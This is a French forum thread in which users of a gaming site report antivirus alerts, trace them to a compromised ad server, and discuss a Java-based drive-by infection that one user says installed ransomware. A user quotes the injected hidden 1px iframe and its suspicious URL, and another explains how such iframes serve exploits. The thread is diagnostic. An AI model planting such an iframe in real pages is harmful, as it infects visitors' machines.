Message d'avertissement de malware - OUI ON EST AU COURANT ! Le Pb est réglé.

[abelthorne]

En voulant accéder à la première page du thread sur Mark of the Ninja, j'ai un message d'avertissement de la part de Chrome qui me dit que la page contient des saloperies en provenance de antiochofedgefield.com.

[Aerial]

Je relance en signalant que mon Kaspersky s'est illuminé à l'instant en me connectant sur la page d'accueil du forum en signalant un Trojan apparemment en provenance de pub2.canardpc.com.




AdBlock permet apparemment de corriger le problème...

[Lucaxor]

Pareil, Kaspersky s'affole au boulot.
Et de même, la réactivation de Ghostscript règle le soucis...

[Durack]

J ai avast qui s'affole !
appremment un probleme avec la banniere DL game ou du moins un message juste en dessous .

[Flad]

Même chose chez moi, et gros blocage de mon pc du taf aussi ^^

Et quand on active ad block : plus de message d'alerte.

[Yog-Sothoth]

Pareil avec Avast comme Durack, version gratuite, sur un portable win7 64 bits et internet explorer classique.
Du coup je vais arrêter pour aujourd'hui ça me sonne les oreilles à chaque page CPC.

[_Uriel_]

Même chose avec Avast, version gratuite, XP SP3 et Opera.

[abelthorne]

Et pour info, le problème que j'ai signalé il y a trois semaines en ouvrant ce thread est toujours là. Tout le monde s'en fout, chez CPC, des problèmes avec le site ? La rubrique est juste là pour décorer ?

[Trichelieut]

Même problème ici. Je le signale comme ça, la masse est plus grande encore.

[alegria unknown]

ame src="http://sportop.c0m.li/yoO4TAbn2tpl5DltCfASJIZ2spEJPLSn" name="Alexa" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

J'ai un truc comme ça, juste sous le bandeau DL Gamer.

Edit: Comme sur la capture de Durack quoi

[Anonyme871]

En voulant accéder à la première page du thread sur Mark of the Ninja, j'ai un message d'avertissement de la part de Chrome qui me dit que la page contient des saloperies en provenance de antiochofedgefield.com.

Je viens de tester, j'ai le même souci.

[RoRo123]

Pareille Avast s'excite comme un fou !

[gros_bidule]

Bloquez ces fichues pubs, c'tout
Au pire blindez un coup votre fichier hosts et à vous le surf tranquille ( ex de hosts pas gros et très bien gaulé pour bloquer énormément de pubs et url malveillantes : http://someonewhocares.org/hosts/ ). Ca évite aussi de devoir installer des extensions à la Adblocks & co.

[Faboulous]

De même chez moi jolie message de la part de KIS !

[gros_bidule]

Z'avez envoyé un mail au staff CPC ?

[ElviejoDragon]

Idem avec avast chez moi aujourd'hui.

Bloquez ces fichues pubs, c'tout

Elles participent au financement de CPC, c'est un des rares sites où je n'active pas AdBlock.

[RUPPY]

Idem : j'ai ce message de Chrome lorsque je vais sur le topic de Mark of the ninja à cette adresse : http://forum.canardpc.com/threads/72...k+of+the+ninja

[gros_bidule]

Si ça le fait sur une page spécifique, ça ne serait pas la signature d'un coincoin comportant un lien malveillant ? (ché pas, j'affiche pas les signatures, marre des banderoles clignotantes CallOf/XBox/GrosKiki 300x500px de 2Mo)

[abelthorne]

Ça peut être une signature, un lien vers un site qui s'est retrouvé vérolé, une image hébergée sur un site qui s'est retrouvé vérolé...

[gros_bidule]

my0.02€. Mais si c'est ça, autant repérer et taper le gugus. Ca sera plus efficace. D'autant que là ce n'est pas du ressort de CPC (au pire ils ban le méchant coincoin, mais je ne vois pas ce qu'ils pourraient faire de plus).

[mdo91]

my0.02€. Mais si c'est ça, autant repérer et taper le gugus. Ca sera plus efficace. D'autant que là ce n'est pas du ressort de CPC (au pire ils ban le méchant coincoin, mais je ne vois pas ce qu'ils pourraient faire de plus).

je vois pas trop comment un gus, en hébergeant une photo, aurait pu faire que toutes les sections soient infectées

[abelthorne]

Pas toutes les sections mais si le problème (celui dont je parle au début de ce thread, pas celui qui concerne la bannière de pub) vient de la signature de quelqu'un, il concerne chaque page où un de ses messages apparaît, donc potentiellement d'autres pages/threads.

[ack]

De fortes chances que ca soit automatique, c'est classique, une iframe qui load un exploit pour farmer du client pour un botnet. Ca essaie de lancer un applet java qui va infecter ceux qui ont le malheur de l'avoir installe sur leur PC. Si un admin passe par la, c'est mon domaine (secu IT), si vous voulez un coup de main ..

[JPKoffe]

Le "coupable" est frostphoenyx avec son image de Darth Vador.

[ack]

Ça ne vient a priori pas d'une signature, et le code malicieux est présent sur toutes les pages (y compris la home) de ce que j'ai pu voir. Il faudra investiguer, mais il est possible que le vecteur de diffusion soit la régie de pub, méthode classique et qui fonctionne bien pour ceux qui cherchent a diffuser leurs exploits.

Un bout du code qu'on voit sur la page d'accueil :



On voit le

Code:

height="1px" width="1px"

typique des iframe malware, et le nom de domaine suspect sportop.c0m.li

[Crackhead Funky]

J'ai aussi le soucis, signalé par KIS.

[Nacodaco]

Ah enfin ! Je galérais trois heures pour afficher chaque page, obliger d'actualiser une dizaine de fois...

-> Adblock et tout est rentré dans l'ordre !

[Monsieur Cacao]

découvert : cheval de Troie HEUR:Trojan.Script.Iframer Le fichier: http://pub2.canardpc.com/www/deliver.../canardpc.com/

Je me joins à la plainte

[Jelk]

Mal réveillé, j'ai accepté la demande java pensant que c'était une des pubs qui fait vivre le site.

Pour votre information c'est donc un ransomware bien chiant.

En train d'essayer de débloquer le pc du bureau, cette saleté bloquant même le mode sans echec ( fermeture automatique de la session ).

[mikelion]

Idem, kaspersky détecte un trojan sur toutes les pages du forum.